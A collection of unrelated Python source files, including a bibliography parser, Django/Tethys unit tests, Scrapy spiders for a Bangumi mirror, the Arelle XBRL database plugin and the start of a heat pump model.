""" Extract and return data as DataFrame. """
table, data_scheme = ris_parse(ris_file)
# Empty template DataFrame.
df = pd.DataFrame(columns=['title', 'abstract', 'source', 'year', 'publisher', 'type'], index = range(len(table)))
# Extract relevant data from RIS file table.
if data_scheme == 'ris':
for n, j in enumerate(table):
for i in j:
if i.startswith('TI'):
df.loc[n]['title'] = i[6:]
if i.startswith('AB'):
df.loc[n]['abstract'] = i[6:]
if i.startswith('T2'):
df.loc[n]['source'] = i[6:]
if i.startswith('PY'):
df.loc[n]['year'] = i[6:]
if i.startswith('M3'):
df.loc[n]['type'] = i[6:]
else:
for n, j in enumerate(table):
for i in j:
if i.startswith('%T'):
df.loc[n]['title'] = i[3:]
if i.startswith('%X'):
df.loc[n]['abstract'] = i[3:]
if i.startswith('%B'):
df.loc[n]['source'] = i[3:]
if i.startswith('%D'):
df.loc[n]['year'] = i[3:]
if i.startswith('%0'):
df.loc[n]['type'] = i[3:]
return df | python |
import unittest
import tethys_gizmos.views.gizmo_showcase as gizmo_showcase
from requests.exceptions import ConnectionError
from unittest import mock
from django.test import RequestFactory
from ... import UserFactory
class TestGizmoShowcase(unittest.TestCase):
def setUp(self):
self.user = UserFactory()
self.request_factory = RequestFactory()
def tearDown(self):
pass
@mock.patch('tethys_gizmos.views.gizmo_showcase.list_spatial_dataset_engines')
def test_get_geoserver_wms(self, mock_list_sdes):
endpoint = 'http://localhost:8080/geoserver/rest'
expected_endpoint = 'http://localhost:8080/geoserver/wms'
mock_sde = mock.MagicMock(type='GEOSERVER',
endpoint=endpoint)
mock_list_sdes.return_value = [mock_sde]
result = gizmo_showcase.get_geoserver_wms()
# Check Result
self.assertEqual(expected_endpoint, result)
@mock.patch('tethys_gizmos.views.gizmo_showcase.list_spatial_dataset_engines')
def test_get_geoserver_wms_connection_error(self, mock_list_sdes):
# Connection Error Case
endpoint = 'http://localhost:8080/geoserver/rest'
expected_endpoint = 'http://ciwmap.chpc.utah.edu:8080/geoserver/wms'
mock_sde = mock.MagicMock(type='GEOSERVER',
endpoint=endpoint)
mock_sde.validate.side_effect = ConnectionError
mock_list_sdes.return_value = [mock_sde]
result = gizmo_showcase.get_geoserver_wms()
# Check Result
self.assertEqual(expected_endpoint, result)
def test_index(self):
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
result = gizmo_showcase.index(request)
self.assertEqual(200, result.status_code)
def test_get_kml(self):
request = self.request_factory
result = gizmo_showcase.get_kml(request)
self.assertIn('kml_link', result._container[0].decode())
self.assertEqual(200, result.status_code)
def test_swap_kml(self):
request = self.request_factory
result = gizmo_showcase.swap_kml(request)
self.assertIn('.kml', result._container[0].decode())
self.assertEqual(200, result.status_code)
def test_swap_overlays(self):
request = self.request_factory
result = gizmo_showcase.swap_overlays(request)
self.assertIn('"type": "GeometryCollection"', result._container[0].decode())
self.assertEqual(200, result.status_code)
@mock.patch('tethys_gizmos.views.gizmo_showcase.messages')
def test_google_map_view(self, mock_messages):
mock_mi = mock_messages.info
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
# Need this to fix the You cannot add messages without installing
# django.contrib.messages.middleware.MessageMiddleware
result = gizmo_showcase.google_map_view(request)
# Check result
mock_mi.assert_called_with(request, '[100, 40]')
self.assertEqual(200, result.status_code)
@mock.patch('tethys_gizmos.views.gizmo_showcase.messages')
def test_map_view(self, mock_messages):
mock_mi = mock_messages.info
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
# Need this to fix the You cannot add messages without installing
# django.contrib.messages.middleware.MessageMiddleware
result = gizmo_showcase.map_view(request)
# Check result
mock_mi.assert_called_with(request, '[100, 40]')
self.assertEqual(200, result.status_code)
def test_esri_map(self):
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
result = gizmo_showcase.esri_map(request)
self.assertEqual(200, result.status_code)
def test_jobs_table_result(self):
request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'})
request.user = self.user
result = gizmo_showcase.jobs_table_results(request=request, job_id='1')
self.assertEqual(302, result.status_code)
@mock.patch('tethys_gizmos.views.gizmo_showcase.BasicJob')
@mock.patch('tethys_gizmos.views.gizmo_showcase.CondorWorkflow')
def test_create_sample_jobs(self, mock_cw, mock_bj):
mock_bj().return_value = mock.MagicMock()
request = self.request_factory.get('/jobs')
request.user = self.user
gizmo_showcase.create_sample_jobs(request)
# Check BasicJob Call
mock_bj.assert_called_with(_status='VCP', description='Completed multi-process job with some errors',
label='gizmos_showcase', name='job_8', user=request.user)
mock_cw.assert_called_once()
mock_cw.assert_called_with(name='job_9', user=request.user, description='Workflow job with multiple nodes.',
label='gizmos_showcase', _status='VAR')
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_home(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'home')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('/developer/gizmos/map_layers/cesium-map-view', render_call_args[0][0][2]['map_layers_link'])
self.assertIn('home', render_call_args[0][0][2]['page_type'])
self.assertIn('/developer/gizmos/model/cesium-map-view', render_call_args[0][0][2]['model_link'])
self.assertIn('/developer/gizmos/home/cesium-map-view', render_call_args[0][0][2]['home_link'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_map_layers(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'map_layers')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('map_layers', render_call_args[0][0][2]['page_type'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_terrain(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'terrain')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('terrain', render_call_args[0][0][2]['page_type'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_czml(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'czml')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('czml', render_call_args[0][0][2]['page_type'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_model(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'model')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('model', render_call_args[0][0][2]['page_type'])
self.assertIn('clock', render_call_args[0][0][2]['cesium_map_view'])
self.assertIn('globe', render_call_args[0][0][2]['cesium_map_view'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
def test_cesium_map_view_models(self, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
# Execute
gizmo_showcase.cesium_map_view(request, 'model2')
# Check render
render_call_args = mock_render.call_args_list
self.assertIn('model2', render_call_args[0][0][2]['page_type'])
@mock.patch('tethys_gizmos.views.gizmo_showcase.messages')
def test_cesium_map_view_geometry(self, mock_messages):
request = self.request_factory.get('/jobs')
request.user = self.user
mock_post = mock.MagicMock()
request.POST = mock_post
mock_post.get.return_value = 'test_submitted_geometry'
# Execute
gizmo_showcase.cesium_map_view(request, 'home')
# Check geometry submit
mock_post.get.assert_called_with('geometry', None)
mock_messages.info.assert_called_with(request, 'test_submitted_geometry')
@mock.patch('tethys_gizmos.views.gizmo_showcase.render')
@mock.patch('tethys_gizmos.views.gizmo_showcase.JobsTable')
@mock.patch('tethys_gizmos.views.gizmo_showcase.TethysJob')
def test_jobs_table_demo(self, mock_TethysJob, mock_JobsTable, mock_render):
request = self.request_factory.get('/jobs')
request.user = self.user
result = gizmo_showcase.jobs_table_demo(request)
mock_JobsTable.assert_called_with(
jobs=mock_TethysJob.objects.filter().order_by().select_subclasses(),
column_fields=('id', 'name', 'description', 'creation_time'),
hover=True,
striped=False,
bordered=False,
condensed=False,
results_url='gizmos:results',
refresh_interval=10000,
delete_btn=True,
show_detailed_status=True
)
mock_render.assert_called_with(request, 'tethys_gizmos/gizmo_showcase/jobs_table.html',
{'jobs_table': mock_JobsTable()})
self.assertEqual(mock_render(), result)
| python |
# This file is part of Indico.
# Copyright (C) 2002 - 2021 CERN
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see the
# LICENSE file for more details.
from indico.util.i18n import _
from indico.web.breadcrumbs import render_breadcrumbs
from indico.web.flask.util import url_for
from indico.web.menu import get_menu_item
from indico.web.views import WPDecorated, WPJinjaMixin
class WPAdmin(WPJinjaMixin, WPDecorated):
"""Base class for admin pages."""
def __init__(self, rh, active_menu_item=None, **kwargs):
kwargs['active_menu_item'] = active_menu_item or self.sidemenu_option
WPDecorated.__init__(self, rh, **kwargs)
def _get_breadcrumbs(self):
menu_item = get_menu_item('admin-sidemenu', self._kwargs['active_menu_item'])
items = [(_('Administration'), url_for('core.admin_dashboard'))]
if menu_item:
items.append(menu_item.title)
return render_breadcrumbs(*items)
def _get_body(self, params):
return self._get_page_content(params)
| python |
import json
class ObjectLogService:
"""
Служба журналирования логов по объектам
"""
def __init__(self, app):
"""
:type app: metasdk.MetaApp
"""
self.__app = app
self.__options = {}
def log(self, record):
"""
Делает запись по объекту в журнале
"""
record['dispatcher'] = self.__app.dispatcher_name
if 'value' in record and record['value']:
if not isinstance(record['value'], dict):
raise ValueError("ObjectLogService expected dict in log record value field")
record['jsonValue'] = json.dumps(record['value'])
record.pop('value')
body_value = {
"record": record
}
return self.__app.native_api_call('object-log', 'log', body_value, self.__options, False, None, False, http_path="/api/meta/v1/", http_method='POST')
| python |
# -*- coding: utf-8 -*-
import scrapy
import re
from bgm.items import Record, Index, Friend, User, SubjectInfo, Subject
from bgm.util import *
from scrapy.http import Request
import datetime
import json
mpa = dict([(i, None) for i in range(32)])
class UserSpider(scrapy.Spider):
name = 'user'
def __init__(self, *args, **kwargs):
super(UserSpider, self).__init__(*args, **kwargs)
if not hasattr(self, 'id_max'):
self.id_max=400000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/user/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
if len(response.xpath(".//*[@id='headerProfile']"))==0:
return
user = response.xpath(".//*[@id='headerProfile']/div/div/h1/div[3]/small/text()").extract()[0][1:]
nickname = response.xpath(".//*[@class='headerContainer']//*[@class='inner']/a/text()").extract()[0].translate(mpa)
# Is blocked?
if len(response.xpath("//ul[@class='timeline']/li"))==0:
return;
if not 'redirect_urls' in response.meta:
uid = int(user)
else:
uid = int(response.meta['redirect_urls'][0].split('/')[-1])
date = response.xpath(".//*[@id='user_home']/div[@class='user_box clearit']/ul/li[1]/span[2]/text()").extract()[0].split(' ')[0]
date = parsedate(date)
yield User(name=user, nickname=nickname, uid=uid, joindate=date)
class IndexSpider(scrapy.Spider):
name='index'
def __init__(self, *args, **kwargs):
super(IndexSpider, self).__init__(*args, **kwargs)
if not hasattr(self, 'id_max'):
self.id_max=20000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/index/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
if len(response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/a"))==0:
return
indexid = response.url.split('/')[-1]
indexid=int(indexid)
creator = response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/a/@href").extract()[0].split('/')[-1]
creator=str(creator).translate(mpa)
td = response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/span/span[1]/text()").extract()[0]
date = parsedate(td.split(' ')[0])
if len(response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/span/span"))==2:
favourite = response.xpath(".//*[@id='columnSubjectBrowserA']/div[1]/span/span[2]/text()").extract()[0]
favourite = int(favourite)
else: favourite = 0
items = response.xpath(".//*[@id='columnSubjectBrowserA']/ul/li/@id").extract()
items = [int(itm.split('_')[-1]) for itm in items]
yield Index(indexid=indexid, creator=creator, favourite=favourite, date=date, items=items)
class RecordSpider(scrapy.Spider):
name='record'
def __init__(self, *args, **kwargs):
super(RecordSpider, self).__init__(*args, **kwargs)
if hasattr(self, 'userlist'):
userlist = []
with open(self.userlist, 'r') as fr:
while True:
l = fr.readline().strip()
if not l: break;
userlist.append(l)
self.start_urls = ["http://mirror.bgm.rin.cat/user/"+i for i in userlist]
else:
if not hasattr(self, 'id_max'):
self.id_max=500000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/user/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
username = response.url.split('/')[-1]
if (not response.xpath(".//*[@id='headerProfile']")) or response.xpath(".//div[@class='tipIntro']"):
return
if username in blockusers:
return
uid = int(response.meta['redirect_urls'][0].split('/')[-1]) if 'redirect_urls' in response.meta else int(username)
nickname = next(iter(response.xpath(".//*[@class='headerContainer']//*[@class='inner']/a/text()").extract()), "").translate(mpa)
date = response.xpath(".//*[@id='user_home']/div[@class='user_box clearit']/ul/li[1]/span[2]/text()").extract()[0].split(' ')[0]
date = parsedate(date)
yield User(name=username, nickname=nickname, uid=uid, joindate=date)
if len(response.xpath(".//*[@id='anime']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/anime/list/"+username, callback = self.merge, meta = { 'uid': uid })
if len(response.xpath(".//*[@id='game']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/game/list/"+username, callback = self.merge, meta = { 'uid': uid })
if len(response.xpath(".//*[@id='book']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/book/list/"+username, callback = self.merge, meta = { 'uid': uid })
if len(response.xpath(".//*[@id='music']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/music/list/"+username, callback = self.merge, meta = { 'uid': uid })
if len(response.xpath(".//*[@id='real']")):
yield scrapy.Request("http://mirror.bgm.rin.cat/real/list/"+username, callback = self.merge, meta = { 'uid': uid })
def merge(self, response):
followlinks = response.xpath("//ul[@class='navSubTabs']/li/a/@href").extract() # a list of links
for link in followlinks:
yield scrapy.Request(u"http://mirror.bgm.rin.cat"+link, callback = self.parse_recorder, meta = { 'uid': response.meta['uid'] })
def parse_recorder(self, response):
state = response.url.split('/')[-1].split('?')[0]
page = 1 if '=' not in response.url else int(response.url.split('=')[1])
tp = response.url.split('/')[-4]
items = response.xpath(".//*[@id='browserItemList']/li")
for item in items:
item_id = int(re.match(r"item_(\d+)",item.xpath("./@id").extract()[0]).group(1))
item_date = parsedate(item.xpath("./div/p[@class='collectInfo']/span[@class='tip_j']/text()").extract()[0])
if item.xpath("./div/p[@class='collectInfo']/span[@class='tip']"):
item_tags = item.xpath("./div/p[@class='collectInfo']/span[@class='tip']/text()").extract()[0].split(u' ')[2:-1]
else:
item_tags=None
try_match = next(iter(item.xpath("./div/p[@class='collectInfo']/span[@class='starstop-s']/span/@class").extract()), None)
if try_match is not None:
mtch = re.match(r'starlight stars(\d+)', try_match)
item_rate = mtch.group(1)
item_rate = int(item_rate)
else:
item_rate = None
comment = item.xpath(".//div[@class='text']/text()").extract()[0] if len(item.xpath(".//div[@class='text']")) > 0 else None
watchRecord = Record(
uid = response.meta['uid'],
typ = tp, state = state,
iid = item_id,
adddate = item_date
)
if item_tags:
watchRecord["tags"]=item_tags
if item_rate:
watchRecord["rate"]=item_rate
if comment:
watchRecord["comment"]=comment.translate(mpa)
yield watchRecord
total_count = int(re.search(r"(\d+)", response.xpath("//ul[@class='navSubTabs']/li/a[@class='focus']/span/text()").extract()[0]).group(1))
if 24 * page < total_count:
yield scrapy.Request(getnextpage(response.url),callback = self.parse_recorder, meta = { 'uid': response.meta['uid'] })
class FriendsSpider(scrapy.Spider):
name='friends'
handle_httpstatus_list = [302]
def __init__(self, *args, **kwargs):
super(FriendsSpider, self).__init__(*args, **kwargs)
if not hasattr(self, 'id_max'):
self.id_max=400000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/user/"+str(i)+"/friends" for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
user = response.url.split('/')[-2]
lst = response.xpath(".//*[@id='memberUserList']/li//@href").extract()
for itm in lst:
yield Friend(user = user, friend = str(itm.split('/')[-1]))
class SubjectInfoSpider(scrapy.Spider):
name="subjectinfo"
def __init__(self, *args, **kwargs):
super(SubjectInfoSpider, self).__init__(*args, **kwargs)
if not hasattr(self, 'id_max'):
self.id_max=300000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/subject/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
subject_id = int(response.url.split('/')[-1])
if not response.xpath(".//*[@id='headerSubject']"):
return
if response.xpath(".//div[@class='tipIntro']"):
return
typestring = response.xpath(".//div[@class='global_score']/div/small[1]/text()").extract()[0]
typestring = typestring.split(' ')[1];
infobox = [itm.extract()[:-2] for itm in response.xpath(".//div[@class='infobox']//span/text()")]
infobox = set(infobox)
relations = [itm.extract() for itm in response.xpath(".//ul[@class='browserCoverMedium clearit']/li[@class='sep']/span/text()")]
relations = set(relations)
yield SubjectInfo(subjectid=subject_id,
subjecttype=typestring,
infobox=infobox,
relations=relations)
class SubjectSpider(scrapy.Spider):
name="subject"
def __init__(self, *args, **kwargs):
super(SubjectSpider, self).__init__(*args, **kwargs)
if hasattr(self, 'itemlist'):
itemlist = []
with open(self.itemlist, 'r') as fr:
while True:
l = fr.readline().strip()
if not l: break;
itemlist.append(l)
self.start_urls = ["http://mirror.bgm.rin.cat/subject/"+i for i in itemlist]
else:
if not hasattr(self, 'id_max'):
self.id_max=300000
if not hasattr(self, 'id_min'):
self.id_min=1
self.start_urls = ["http://mirror.bgm.rin.cat/subject/"+str(i) for i in range(int(self.id_min),int(self.id_max))]
def parse(self, response):
subjectid = int(response.url.split('/')[-1]) # trueid
if not response.xpath(".//*[@id='headerSubject']"):
return
# This is used to filter those locked items
# However, considering that current Bangumi ranking list does not exclude blocked items,
# we include them in our spider.
#if response.xpath(".//div[@class='tipIntro']"):
# return;
if 'redirect_urls' in response.meta:
order = int(response.meta['redirect_urls'][0].split('/')[-1])
else:
order = subjectid; # id
subjectname = response.xpath(".//*[@id='headerSubject']/h1/a/attribute::title").extract()[0]
if not subjectname:
subjectname = response.xpath(".//*[@id='headerSubject']/h1/a/text()").extract()[0]
subjecttype = response.xpath(".//div[@class='global_score']/div/small[1]/text()").extract()[0]
subjecttype = subjecttype.split(' ')[1].lower();
infokey = [itm[:-2] for itm in response.xpath(".//div[@class='infobox']//li/span/text()").extract()]
infoval = response.xpath(".//div[@class='infobox']//li")
infobox = dict()
alias = []
for key,val in zip(infokey, infoval):
if val.xpath("a"):
infobox[key]=[ref.split('/')[-1] for ref in
val.xpath("a/@href").extract()]
if key == '别名':
alias.append(val.xpath('text()').extract()[0])
relateditms = response.xpath(".//ul[@class='browserCoverMedium clearit']/li")
relations = dict()
for itm in relateditms:
if itm.xpath("@class"):
relationtype = itm.xpath("span/text()").extract()[0]
relations[relationtype]=[itm.xpath("a[@class='title']/@href").
extract()[0].split('/')[-1]]
else:
relations[relationtype].append(itm.xpath("a[@class='title']/@href").
extract()[0].split('/')[-1])
brouche = response.xpath(".//ul[@class='browserCoverSmall clearit']/li")
if brouche:
relations['单行本']=[itm.split('/')[-1] for itm in
brouche.xpath("a/@href").extract()]
yield Subject(subjectid=subjectid,
subjecttype=subjecttype,
subjectname=subjectname,
order=order,
alias=alias,
staff=infobox,
relations=relations)
| python |
if __package__ is None:
import sys
from os import path
sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )
from functools import partial
from Stream import Stream, StreamArray
from Stream import _no_value
from Operators import stream_func
from stream_test import *
def square(v):
return v*v
def square_stream_when_clock_ticks(
input_stream, trigger_stream):
return stream_func(inputs=input_stream,
f_type='element',
f=square,
num_outputs=1,
call_streams=[trigger_stream]
)
def test():
x = Stream('x')
a = StreamArray('a')
clock_ticks = Stream('clock')
y = square_stream_when_clock_ticks(
input_stream=x, trigger_stream=clock_ticks)
z = square_stream_when_clock_ticks(
input_stream=a, trigger_stream=clock_ticks)
y.set_name('y')
z.set_name('z')
check(y, [9, 25, 4, 16])
check(z, [9.0, 25.0, 4.0, 16.0])
x.extend([3, 5])
a.extend([3, 5])
x.print_recent()
a.print_recent()
clock_ticks.print_recent()
y.print_recent()
z.print_recent()
print
x.extend([2, 4])
a.extend([2, 4])
x.print_recent()
a.print_recent()
clock_ticks.print_recent()
y.print_recent()
z.print_recent()
print
clock_ticks.extend(['tick'])
x.print_recent()
a.print_recent()
clock_ticks.print_recent()
y.print_recent()
z.print_recent()
print
clock_ticks.extend(['tick'])
x.print_recent()
a.print_recent()
clock_ticks.print_recent()
y.print_recent()
z.print_recent()
check_empty()
if __name__ == '__main__':
test()
| python |
'''
xbrlDB is an interface to XBRL databases.
Two implementations are provided:
(1) the XBRL Public Database schema for Postgres, published by XBRL US.
(2) an graph database, based on the XBRL Abstract Model PWD 2.
(c) Copyright 2013 Mark V Systems Limited, California US, All rights reserved.
Mark V copyright applies to this software, which is licensed according to the terms of Arelle(r).
and does not apply to the XBRL US Database schema and description.
'''
import time, os, io, sys, logging
from arelle.Locale import format_string
from .XbrlPublicPostgresDB import insertIntoDB as insertIntoPostgresDB, isDBPort as isPostgresPort
from .XbrlSemanticGraphDB import insertIntoDB as insertIntoRexsterDB, isDBPort as isRexsterPort
from .XbrlSemanticRdfDB import insertIntoDB as insertIntoRdfDB, isDBPort as isRdfPort
dbTypes = {
"postgres": insertIntoPostgresDB,
"rexster": insertIntoRexsterDB,
"rdfDB": insertIntoRdfDB
}
def xbrlDBmenuEntender(cntlr, menu):
def storeIntoDBMenuCommand():
# save DTS menu item has been invoked
if cntlr.modelManager is None or cntlr.modelManager.modelXbrl is None:
cntlr.addToLog("No XBRL instance or taxonomy is loaded.")
return
from arelle.DialogUserPassword import askDatabase
# (user, password, host, port, database)
priorDBconnection = cntlr.config.get("xbrlDBconnection", None)
dbConnection = askDatabase(cntlr.parent, priorDBconnection)
if not dbConnection: # action cancelled
return
def backgroundStoreIntoDB():
try:
host, port, user, password, db, timeout, dbType = dbConnection
if timeout and timeout.isdigit():
timeout = int(timeout)
# identify server
if dbType in dbTypes:
insertIntoDB = dbTypes[dbType]
else:
cntlr.addToLog(_("Probing host {0} port {1} to determine server database type.")
.format(host, port))
if isPostgresPort(host, port):
dbType = "postgres"
insertIntoDB = insertIntoPostgresDB
elif isRexsterPort(host, port):
dbType = "rexster"
insertIntoDB = insertIntoRexsterDB
elif isRdfPort(host, port, db):
dbType = "rdfDB"
insertIntoDB = insertIntoRdfDB
else:
cntlr.addToLog(_("Unable to determine server type!\n ") +
_("Probing host {0} port {1} unable to determine server type.")
.format(host, port))
cntlr.config["xbrlDBconnection"] = (host, port, user, password, db, timeout, '') # forget type
cntlr.saveConfig()
return
cntlr.addToLog(_("Database type {} identified.").format(dbType))
cntlr.config["xbrlDBconnection"] = (host, port, user, password, db, timeout, dbType)
cntlr.saveConfig()
startedAt = time.time()
insertIntoDB(cntlr.modelManager.modelXbrl,
host=host, port=port, user=user, password=password, database=db, timeout=timeout)
cntlr.addToLog(format_string(cntlr.modelManager.locale,
_("stored to database in %.2f secs"),
time.time() - startedAt))
except Exception as ex:
import traceback
cntlr.addToLog(
_("[xpDB:exception] Loading XBRL DB: %(exception)s: %(error)s \n%(traceback)s") %
{"exception": ex.__class__.__name__,
"error": str(ex),
"exc_info": True,
"traceback": traceback.format_tb(sys.exc_info()[2])})
cntlr.config["xbrlDBconnection"] = (host, port, user, password, db, timeout, '') # forget type
cntlr.saveConfig()
import threading
thread = threading.Thread(target=backgroundStoreIntoDB)
thread.daemon = True
thread.start()
# Extend menu with an item for the savedts plugin
menu.add_command(label="Store to XBRL DB",
underline=0,
command=storeIntoDBMenuCommand)
# add log handler
logging.getLogger("arelle").addHandler(LogToDbHandler())
def storeIntoDB(dbConnection, modelXbrl, rssItem=None):
host = port = user = password = db = timeout = dbType = None
if isinstance(dbConnection, (list, tuple)): # variable length list
if len(dbConnection) > 0: host = dbConnection[0]
if len(dbConnection) > 1: port = dbConnection[1]
if len(dbConnection) > 2: user = dbConnection[2]
if len(dbConnection) > 3: password = dbConnection[3]
if len(dbConnection) > 4: db = dbConnection[4]
if len(dbConnection) > 5 and dbConnection[5] and dbConnection[5].isdigit():
timeout = int(dbConnection[5])
if len(dbConnection) > 6: dbType = dbConnection[6]
startedAt = time.time()
if dbType in dbTypes:
insertIntoDB = dbTypes[dbType]
elif isPostgresPort(host, port):
insertIntoDB = insertIntoPostgresDB
elif isRexsterPort(host, port):
insertIntoDB = insertIntoRexsterDB
elif isRdfPort(host, port, db):
insertIntoDB = insertIntoRdfDB
else:
modelXbrl.modelManager.addToLog('Server at "{0}:{1}" is not recognized to be either a Postgres or a Rexter service.'.format(host, port))
return
insertIntoDB(modelXbrl, host=host, port=port, user=user, password=password, database=db, timeout=timeout, rssItem=rssItem)
modelXbrl.modelManager.addToLog(format_string(modelXbrl.modelManager.locale,
_("stored to database in %.2f secs"),
time.time() - startedAt), messageCode="info", file=modelXbrl.uri)
def xbrlDBcommandLineOptionExtender(parser):
# extend command line options to import sphinx files into DTS for validation
parser.add_option("--store-to-XBRL-DB",
action="store",
dest="storeToXbrlDb",
help=_("Store into XBRL DB. "
"Provides connection string: host,port,user,password,database[,timeout[,{postgres|rexster|rdfDB}]]. "
"Autodetects database type unless 7th parameter is provided. "))
logging.getLogger("arelle").addHandler(LogToDbHandler())
def xbrlDBCommandLineXbrlLoaded(cntlr, options, modelXbrl):
from arelle.ModelDocument import Type
if modelXbrl.modelDocument.type == Type.RSSFEED and getattr(options, "storeToXbrlDb", False):
modelXbrl.xbrlDBconnection = options.storeToXbrlDb.split(",")
def xbrlDBCommandLineXbrlRun(cntlr, options, modelXbrl):
from arelle.ModelDocument import Type
if modelXbrl.modelDocument.type != Type.RSSFEED and getattr(options, "storeToXbrlDb", False):
dbConnection = options.storeToXbrlDb.split(",")
storeIntoDB(dbConnection, modelXbrl)
def xbrlDBvalidateRssItem(val, modelXbrl, rssItem):
if hasattr(val.modelXbrl, 'xbrlDBconnection'):
storeIntoDB(val.modelXbrl.xbrlDBconnection, modelXbrl, rssItem)
def xbrlDBdialogRssWatchDBconnection(*args, **kwargs):
try:
from .DialogRssWatchExtender import dialogRssWatchDBextender
dialogRssWatchDBextender(*args, **kwargs)
except ImportError:
pass
def xbrlDBdialogRssWatchValidateChoices(dialog, frame, row, options, cntlr):
from arelle.UiUtil import checkbox
dialog.checkboxes += (
checkbox(frame, 2, row,
"Store into XBRL Database",
"storeInXbrlDB"),
)
def xbrlDBrssWatchHasWatchAction(rssWatchOptions):
return rssWatchOptions.get("xbrlDBconnection") and rssWatchOptions.get("storeInXbrlDB")
def xbrlDBrssDoWatchAction(modelXbrl, rssWatchOptions, rssItem):
dbConnectionString = rssWatchOptions.get("xbrlDBconnection")
if dbConnectionString:
dbConnection = dbConnectionString.split(',')
storeIntoDB(dbConnection, modelXbrl)
class LogToDbHandler(logging.Handler):
def __init__(self):
super(LogToDbHandler, self).__init__()
self.logRecordBuffer = []
def flush(self):
del self.logRecordBuffer[:]
def dbHandlerLogEntries(self, clear=True):
entries = []
for logRec in self.logRecordBuffer:
message = { "text": self.format(logRec) }
if logRec.args:
for n, v in logRec.args.items():
message[n] = v
entry = {"code": logRec.messageCode,
"level": logRec.levelname.lower(),
"refs": logRec.refs,
"message": message}
entries.append(entry)
if clear:
del self.logRecordBuffer[:]
return entries
def emit(self, logRecord):
self.logRecordBuffer.append(logRecord)
__pluginInfo__ = {
'name': 'XBRL Database',
'version': '0.9',
'description': "This plug-in implements the XBRL Public Postgres and Abstract Model Graph Databases. ",
'license': 'Apache-2 (Arelle plug-in), BSD license (pg8000 library)',
'author': 'Mark V Systems Limited',
'copyright': '(c) Copyright 2013 Mark V Systems Limited, All rights reserved,\n'
'uses: pg8000, Copyright (c) 2007-2009, Mathieu Fenniak (XBRL Public Postgres DB), and\n'
' rdflib, Copyright (c) 2002-2012, RDFLib Team (RDF DB)',
# classes of mount points (required)
'CntlrWinMain.Menu.Tools': xbrlDBmenuEntender,
'CntlrCmdLine.Options': xbrlDBcommandLineOptionExtender,
'CntlrCmdLine.Xbrl.Loaded': xbrlDBCommandLineXbrlLoaded,
'CntlrCmdLine.Xbrl.Run': xbrlDBCommandLineXbrlRun,
'DialogRssWatch.FileChoices': xbrlDBdialogRssWatchDBconnection,
'DialogRssWatch.ValidateChoices': xbrlDBdialogRssWatchValidateChoices,
'RssWatch.HasWatchAction': xbrlDBrssWatchHasWatchAction,
'RssWatch.DoWatchAction': xbrlDBrssDoWatchAction,
'Validate.RssItem': xbrlDBvalidateRssItem
} | python |
"""Heat pump module
Modelling a heat pump with modelling approaches of
simple, lorentz, generic regression, and standard test regression
"""
import os
import math
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
import tools as t
import weather
import inputs
plt.style.use('ggplot')
plt.rcParams.update({'font.size': 22})
def perf(name, subname):
myInputs = inputs.Inputs(name, subname)
input_weather = myInputs.weather()
inputs_basics = myInputs.heatpump_basics()
modelling_approach = inputs_basics['modelling_approach']
if modelling_approach == 'Simple':
inputs_simple = myInputs.heatpump_simple()
inputs_demands = myInputs.demands()
myHeatPump = HeatPump(
inputs_basics['heat_pump_type'],
inputs_basics['modelling_approach'],
